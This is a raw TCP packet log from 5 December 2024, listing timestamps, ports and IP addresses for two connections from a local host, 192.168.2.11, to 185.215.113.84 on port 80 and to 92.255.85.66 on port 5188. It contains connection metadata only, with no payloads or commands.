Dec 5, 2024 17:32:14.350842953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.351721048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.351763964 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.351886034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.351922989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.352725029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.352765083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.353004932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.353040934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.353880882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.354044914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.354090929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.355081081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.355124950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.355195999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.355230093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.356168032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.356215000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.356369972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.356408119 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.357345104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.357388020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.357475996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.357515097 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.358479023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.358515978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.358700037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.358736038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.359719992 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.360059023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.360102892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.360760927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.360781908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.360821962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.360955954 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.360991001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.361960888 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.362468958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.362514973 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.363110065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.363152027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.363472939 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.363509893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.364283085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.364331961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.364464998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.364506960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.365480900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.365556955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.365605116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.366673946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.366718054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.366749048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.366842985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.367763996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.367815018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.367846012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.367865086 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.368913889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.368977070 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.369282961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.369321108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.370089054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.370251894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.370343924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.370385885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.371211052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.371253967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.371500015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.372375011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.372417927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.372513056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.372550011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.373509884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.373545885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.373625040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.373656988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.374718904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.374799013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.374845028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.376053095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.376091957 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.376169920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.376213074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.376987934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.377027988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.377144098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.377183914 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.378142118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.378339052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.378381014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.379277945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.379326105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.379534960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.379585028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.380434036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.380477905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.380563021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.380604982 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.381589890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.381633997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.381701946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.381742001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.382777929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.383004904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.383059025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.383899927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.383951902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.384304047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.384352922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.385023117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.385077953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.385329962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.385401011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.386245012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.386257887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.386286974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.386305094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.387398958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.387542963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.387583017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.388559103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.388830900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.388873100 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.389673948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.389718056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.389836073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.389872074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.390851021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.390948057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.390995026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.391973019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.392031908 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.392113924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.392167091 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.393136024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.393192053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.393280983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.393515110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.394304991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.394349098 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.394476891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.394557953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.395502090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.395612001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.395664930 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.396585941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.396632910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.396675110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.396714926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.397758961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.397800922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.397927999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.398159027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.398912907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.399029016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.399148941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.399260044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.400064945 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.400121927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.400163889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.400204897 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.401859045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.401890039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.401937008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.402755022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.402805090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.402848005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.402895927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.403706074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.403753996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.403904915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.403963089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.404632092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.404679060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.428905964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.428970098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.429048061 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.429354906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.429502010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.429547071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.430634975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.430779934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.430830956 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.431747913 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.431788921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.432861090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.432907104 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.432988882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.433377028 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.433922052 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.434176922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.434271097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.435033083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.435558081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.436156034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.436203957 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.436342955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.437309027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.437357903 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.437683105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.437747002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.438446999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.438602924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.438700914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.439585924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.439814091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.439857960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.440706015 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.440758944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.440812111 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.441893101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.442074060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.442172050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.443064928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.443170071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.444000959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.444175005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.444453001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.444535017 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.445283890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.445497990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.445557117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.446439028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.446665049 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.446743011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.447524071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.447884083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.447926998 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.448689938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.448807955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.449810028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.449852943 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.449947119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.450800896 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.451070070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.451240063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.452032089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.452100992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.452425957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.452486038 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.453259945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.453361988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.453511000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.454384089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.454658031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.454751968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.455518007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.456023932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.456741095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.456789970 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.456828117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.457823992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.457865953 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.458003998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.458899021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.458997011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.459352016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.459397078 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.460151911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.460287094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.460340977 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.461261034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.461458921 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.461570024 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.462358952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.462604046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.462649107 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.463464975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.463515997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.463567972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.464637041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.464761972 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.465773106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.465818882 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.465827942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.465961933 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.466907024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.466985941 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.467119932 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.468065977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.468291044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.468338966 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.469167948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.469340086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.469755888 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.470333099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.470352888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.471445084 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.471508980 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.471513033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.472558022 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.472564936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.472636938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.472719908 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.473721981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.473824978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.474910021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.474978924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.474980116 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.475977898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.476042032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.476207018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.476268053 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.477150917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.477199078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.477253914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.478393078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.478441000 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.478521109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.479468107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.479481936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.479561090 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.480688095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.480700016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.481667042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.481750965 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.481779099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.482387066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.482829094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.483067989 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.483144045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.484036922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.484069109 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.484112024 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.485101938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.485304117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.485409975 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.486238956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.486577988 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.486619949 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.487375021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.487508059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.487601995 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.488459110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.533627987 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.536268950 CET	80	49793	185.215.113.84	192.168.2.11
